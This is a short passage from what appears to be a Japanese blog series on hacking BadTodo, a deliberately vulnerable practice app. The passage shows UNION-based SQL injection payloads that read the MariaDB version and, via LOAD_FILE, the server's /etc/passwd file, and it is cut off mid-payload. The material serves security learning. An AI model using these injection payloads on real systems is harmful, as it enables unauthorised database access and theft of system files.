前回:やられアプリ BadTodo - 3.5 SQLインジェクション 情報の改ざん・追加・削除 - demandosigno MariaDBのバージョンの表示 SELECT @@version; ' UNION SELECT null,null,@@version,null,null,null,null,null,null,null# passwdファイルの表示 SELECT LOAD_FILE(); 文字列関数 LOAD_FILE を使用してサーバ(コンテナ badtodo-db)の /etc/passwd を表示する。 ' UNION SELECT null,null,LOAD_FILE…